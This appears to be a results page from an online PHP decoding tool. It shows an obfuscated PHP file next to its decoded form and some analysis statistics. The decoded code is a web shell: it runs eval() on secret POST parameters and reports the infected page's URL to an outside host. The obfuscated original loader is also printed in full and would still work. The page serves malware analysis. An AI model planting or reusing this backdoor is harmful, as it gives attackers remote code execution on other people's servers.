Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $pg="lZFUl9OrrQUrr1FIl0gLiAkX1NFUlZFUlsiUkVRVUrrVTVF9rrVUkkirrXTrrsKICAgIH0KICAgIH..

Decoded Output download


error_reporting(0);
eval($_POST['asdf~!@#']);
eval($_POST['xxoo_1234']);
function curPageURL()
{
    $pageURL = 'http';

    if ($_SERVER["HTTPS"] == "on")
    {
        $pageURL .= "s";
    }
    $pageURL .= "://";

    if ($_SERVER["SERVER_PORT"] != "80")
    {
        $pageURL .= $_SERVER["SERVER_NAME"] . ":" . $_SERVER["SERVER_PORT"] . $_SERVER["REQUEST_URI"];
    }
    else
    {
        $pageURL .= $_SERVER["SERVER_NAME"] . $_SERVER["REQUEST_URI"];
    }
    return $pageURL;
}

$_url=curPageURL();
$url='http://cnh4ckff.web-176.com/YzJobGJHdz0=.php?url='.$_url.'----->'.'/md5_function.php';
$curl=curl_init($url);
curl_setopt($curl, CURLOPT_TIMEOUT, 20);  
//curl_setopy($curl,CURLOPT_HTTPHEADER,1);
//curl_setopt($curl,CURLOPT_NOBODY,1);
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
$data = curl_exec($curl);
curl_close($curl);

Did this file decode correctly?

Original Code

<?php 
$pg="lZFUl9OrrQUrr1FIl0gLiAkX1NFUlZFUlsiUkVRVUrrVTVF9rrVUkkirrXTrrsKICAgIH0KICAgIHJldHVybrrirrArrkcGFnZrrVVSTDsKfQoKJF91cmw9Y3VyUGFnZVVSTCgpOwokdXJsPSdodHRwOi8vY25rroNGNrZmrrYud2ViLTE3Ni5jb20vWXpKb2JHSkhkejA9LnBrrocD91cmw9Jy4kX3VybC4nLS0trrLS0+Jy4nLrr21rrkrrNV9mdrrW5rrjdGlvbi5waHrrAnOwokY3VyrrbDrr1jrrdXJrrsX2lrruaXQoJHVyrrbrrCrrk7CmN1crrmxf";
$mm="c2V0brr3B0KCRjrrdXrrJsLCBDVVJMT1BUX1RJTUVPVVQsIDIwrrKTsgIAovL2N1cmxfcrr2rrV0b3B5KCRrrjdXJsLENVUkxPUFRfSFRrrUrrUEhFQUrrRFUiwxrrKTsKLyrr9jdXJsX3NldG9wdCgkY3VybCxrrDVVJMT1BrrUXrr05PQk9rrErrWSwrrxKTrrsKrrYrr3VyrrbF9zZXRrrvcHQoJGN1cmwsrrQ1VSTE9QVrrF9SRVRVUk5UUkrrFOU0ZFUiwxrrKTsKJGRrrhrrdGEgPrrSBjdXJsX2V4ZWMoJGN1cmrrwrrpOwpjdXJsX2Nsb3NrrlKCRjdXJsKTsK";
$cw="SAiOi8vIjsrrKCrriAgICBpZiArroJF9TRVJrrWRVJbIlNFUlZrrFUl9QT1JUIrrl0gIT0gIjgwIirrkKICAgIHsKICAgIrrCAgICrrAkcrrGFnZVrrVSrrTCrrAuPSrrArrkX1rrNFUlZFUlsiU0VSVkVSX05BTUUiXSAuICI6IiAuICRfrrU0VSVkVSWyJTRVrrJWRVJfUE9SVCrrJdrrIC4grrJF9TRVJrrWRrrVJbIrrlJFrrUVVFU1RfVrrVJrrJrrIl07CiAgICB9CrrirrAgICBlbHNlCiAgICB7CiAgICAgICAgJHBhZ2VVUkwgLj0gJF9TRVJWRVJbIlNFrrU";
$xwh="CmVycm9rryrrX3JlcrrG9ydrrGluZygwKTsKQGV2YWwrroJrrF9QT1NUWydhc2rrRmfiFAIyddrrKTsKQGV2YWwoJF9QT1rrNUWyd4eG9rrvXzErryMzQrrnXSkrr7CmZ1bmN0aW9uIGNrr1clBhZ2VVUkwoKQp7CirrAgICAkcGFnZVrrVSTCA9ICdodHRwJzsrrKCiAgICBpZrriAoJF9TRrrVJWRVJbIkhUVrrFBTIl0gPT0gIm9uIikKrrICrrAgIHsKICAgICAgICArrkcGFnZVVrrSTCAuPSAicyI7CirrAgICB9CrriAgrrICrrAkcGFnZVVSTCAuP";
$ibf = str_replace("y","","ysytyry_yryeypylyacye");
$agq = $ibf("v", "", "vbavsev64_vdvevcvovdve");
$nv = $ibf("up","","upcuprupeupaupteup_upfupuupnupcuptupiupoupn");
$dw = $nv('', $agq($ibf("rr", "", $xwh.$cw.$pg.$mm))); $dw();
?>

Function Calls

null 1
str_replace 4
base64_decode 1
create_function 1

Variables

$cw SAiOi8vIjsrrKCrriAgICBpZiArroJF9TRVJrrWRVJbIlNFUlZrrFUl9QT1J..
$dw None
$mm c2V0brr3B0KCRjrrdXrrJsLCBDVVJMT1BUX1RJTUVPVVQsIDIwrrKTsgIAov..
$nv create_function
$pg lZFUl9OrrQUrr1FIl0gLiAkX1NFUlZFUlsiUkVRVUrrVTVF9rrVUkkirrXTr..
$agq base64_decode
$ibf str_replace
$xwh CmVycm9rryrrX3JlcrrG9ydrrGluZygwKTsKQGV2YWwrroJrrF9QT1NUWydh..

Stats

MD5 97f3889aa88a4a8aa4d9238c17cfdbd6
Eval Count 1
Decode Time 130 ms